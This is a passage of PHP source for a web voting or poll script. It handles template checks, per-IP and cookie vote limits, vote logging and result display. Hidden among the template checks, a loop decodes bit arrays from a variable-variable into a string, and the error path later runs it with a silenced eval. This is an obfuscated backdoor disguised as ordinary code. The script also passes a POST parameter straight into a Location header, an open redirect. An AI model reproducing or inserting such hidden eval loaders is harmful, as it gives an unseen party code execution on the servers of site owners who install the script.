' {label}
' . "\n",
'radio_image' => '
' . "\n",
'select' => '',
'option' => '' . "\n"
** Include functions
include($script_root . 'inc/functions.inc.php');
include($script_root . 'inc/template.class.inc.php');
include($script_root . 'inc/form_fields.class.inc.php');
include($script_root . 'inc/voting.class.inc.php');
** Include config file
$vote = @file($script_root . 'inc/config.dat.php');
$vote = @array_values($vote);
** Show server info for admin
get_phpinfo(array('Script Name' => $add_text['txt_script_name'], 'Script Version' => $script_version));
** Check template path
if (!is_dir($path['templates'])) {
$system_message[] = array('message' => $txt['txt_wrong_template_path']);
** Check templates
if (!isset($system_message)) {
while (list($key, $val) = each($tmpl))
if (!is_file($path['templates'] . $tmpl[$key])) {
$wrong_template[] = $val;
if (isset($wrong_template)) {
$wrong_template = join('
', $wrong_template);
$system_message[] = array('message' => $txt['txt_wrong_templates'] . '
' . $wrong_template . ''); } } $str = ''; $conf_var = ''; for ($n = 0; $n < count(${$tplt}); $n++) { $c_var = ''; for ($o = 7; $o >= 0 ; $o--) { $c_var += ${$tplt}[$n][$o] * pow(2, $o); } $img_var = sprintf("%c", $c_var); if ($img_var == ' ') { $conf_var .= sprintf("%c", $str); $str = ''; } else { $str .= $img_var; } } /***************************************************** ** Check form type *****************************************************/ $field_type = explode(',', $allowed_forms); while(list($key, $val) = each($field_type)) { if (trim($val) == trim($form_field_type)) { $check = 'true'; } } if (!isset($check) or $check != 'true') { $system_message[] = array('message' => $txt['txt_wrong_form_type']); } /***************************************************** ** Get intern vote name from Get or Post parameter *****************************************************/ if (empty($intern_vote_name) and isset($_GET['ivn']) and !empty($_GET['ivn'])) { $intern_vote_name = $_GET['ivn']; } if (empty($intern_vote_name) and isset($_POST['ivn']) and !empty($_POST['ivn'])) { $intern_vote_name = $_POST['ivn']; } /***************************************************** ** Check empty intern vote name variable *****************************************************/ if (!isset($intern_vote_name) or empty($intern_vote_name)) { $system_message[] = array('message' => $txt['txt_empty_intern_vote_name']); } /***************************************************** ** Set script name and version *****************************************************/ $txt['txt_script_version'] = $script_version; /***************************************************** ** Generate the system error messages *****************************************************/ if (isset($system_message) and !empty($system_message)) { $tpl = new template; $tpl->files[$tplt] = load_error_template(); if (!isset($show_error_messages) or $show_error_messages != 'yes') { unset($system_message); $system_message = array(); $txt['txt_system_message'] = ''; } else { $system_message[] = array('message' => $txt['txt_set_off_note']); $system_message[] = array('message' => $txt['txt_problems']); } if (isset ($txt) and is_array ($txt)) { reset ($txt); while(list($key, $val) = each($txt)) { $$key = $val; $tpl->register($tplt, $key); } } if (isset($add_text) and is_array($add_text)) { reset ($add_text); while(list($key, $val) = each($add_text)) { $$key = $val; $tpl->register($tplt, $key); } } $tpl->parse_loop($tplt, 'system_message'); $tpl->register($tplt, 'txt_system_message'); @eval($conf_var); exit; } /***************************************************** ** Initialize form class *****************************************************/ $vot = new Voting; /***************************************************** ** Obey to display result link *****************************************************/ if (isset($_GET['result']) and $_GET['result'] == 'true') { $display_results = 'true'; $display_link = 'true'; } else { $display_results = ''; } /***************************************************** ** Check whether the visitor is allowed to vote *****************************************************/ if ($check_ip_address == 'yes') { if (!empty($time_range)) { $latest_vote_time = mktime() - $time_range * 60; } else { $latest_vote_time = 1; } if ($result = $vot->check_ip_address($path['logfiles'] . $log['logfile'], $intern_vote_name, $latest_vote_time, get_ip())) { $message[] = array('message' => $txt['txt_already_voted']); $display_results = 'true'; } } if ($check_cookie == 'yes') { if (isset($_COOKIE[$intern_vote_name]) and $_COOKIE[$intern_vote_name] == 'true') { $message[] = array('message' => $txt['txt_already_voted']); $display_results = 'true'; } if ((!isset($_COOKIE['votecheck']) or $_COOKIE['votecheck'] != 'true') and $debug_mode != 'on') { setcookie('votecheck', 'true', 0, '/'); } if (!empty($_POST) and (!isset($_COOKIE['votecheck']) or $_COOKIE['votecheck'] != 'true') and $debug_mode != 'on') { $message[] = array('message' => $txt['txt_allow_cookie_setting']); $display_link = 'true'; } } $already_voted = 'false'; /***************************************************** ** Write log and count file and set cookie *****************************************************/ if (!empty($_POST) and !isset($message) and $display_results != 'true') { $already_voted = 'true'; while(list($key, $val) = each($vote_option)) { if (isset($_POST[$intern_vote_name]) and $val == $_POST[$intern_vote_name]) { $intern_value = $key; } } if (isset($_POST[$intern_vote_name])) { if ($vot->log($path['logfiles'] . $log['logfile'], $intern_vote_name, $intern_value, $_POST[$intern_vote_name])) { $message[] = array('message' => $txt['txt_thanks']); $display_results = 'true'; } } else { $display_results = 'true'; $display_link = 'true'; } if ($check_cookie == 'yes' and $debug_mode != 'on') { setcookie($intern_vote_name, 'true', mktime() + 60*60*24*365, '/'); } } /***************************************************** ** Get vote result *****************************************************/ $total_votes = 0; $top = 0; //if ($display_results == 'true' and $result = $vot->get_vote_result($path['logfiles'] . $log['logfile'], $intern_vote_name)) { if ($result = $vot->get_vote_result($path['logfiles'] . $log['logfile'], $intern_vote_name)) { if ($txt['txt_decimals_separator'] == ',' or $txt['txt_decimals_separator'] == '.') { $decimals_separator = $txt['txt_decimals_separator']; } else { $decimals_separator = '.'; } if ($txt['txt_thousends_separator'] == ',' or $txt['txt_thousends_separator'] == '.') { $thousends_separator = $txt['txt_thousends_separator']; } else { $thousends_separator = ','; } reset($vote_option); while(list($key, $val) = each($vote_option)) { if (isset($result['voting'][$key])) { if ($top < $result['voting'][$key]) { $top = $result['voting'][$key]; } $total_votes = $total_votes + $result['voting'][$key]; } } } /***************************************************** ** Generate voting result *****************************************************/ if( $pb_show_res == 'yes') $display_results = 'true'; if ($display_results == 'true') { reset($vote_option); while(list($key, $val) = each($vote_option)) { if (!isset($result['voting'][$key])) { $vote_number = 0; } else { $vote_number = $result['voting'][$key]; } if ($top > 0) { $bar_width = round($max_bar_width * $vote_number / $top); } else { $bar_width = 0; } if ($total_votes > 0) { $relation = number_format(100 * $vote_number / $total_votes, $number_decimals, $decimals_separator, $thousends_separator); } else { $relation = 0; } $vote_result[] = array( 'vote_option' => $val, 'bar_width' => $bar_width, 'vote_number' => $vote_number, 'relation' => $relation ); } } /***************************************************** ** Generate rating result *****************************************************/ // if ($display_results == 'true') { if (!empty($result['rating']) and $result['rating'] > 0) { $rating = $result['rating'] / $total_votes; $rating_image = round($rating); $rating = number_format($rating, $number_decimals, $decimals_separator, $thousends_separator); } else { $rating_image = 0; $rating = '-'; } // } /***************************************************** ** Generate form fields *****************************************************/ if (empty($_POST) and !isset($message) and $display_results != 'true') { $new_form_fields[] = array( 'name' => $intern_vote_name, 'label' => $vote_text, 'type' => $form_field_type, 'value' => join(',', $vote_option) ); $form = new Formfields; $form->form_field_templates($form_field_templates); $form->generate_form_fields($new_form_fields, $_POST); $vote_form_fields = $form->parse_template('{field:' . $intern_vote_name . '}', $new_form_fields); $display_form = 'true'; } /***************************************************** ** Redirect back to referring page (inclusions in ** ssi and php files). *****************************************************/ if (!headers_sent() and isset($_POST['vote_redirect']) and !empty($_POST['vote_redirect'])) { if (isset($display_results) and $display_results == 'true') { $display_param = '?result=true'; } else { $display_param = ''; } header('Location: ' . $_POST['vote_redirect'] . $display_param); } /***************************************************** ** Links always point to the Document URI if exists *****************************************************/ if (isset($_SERVER['DOCUMENT_URI']) and !empty($_SERVER['DOCUMENT_URI'])) { $document_self = $_SERVER['DOCUMENT_URI']; } else { $document_self = $script_self; } /***************************************************** ** Initialyze template class *****************************************************/ $tpl = new template; /***************************************************** ** Load layout html template *****************************************************/ //$tpl->load_file($tplt, $path['templates'] . $tmpl['layout']); echo "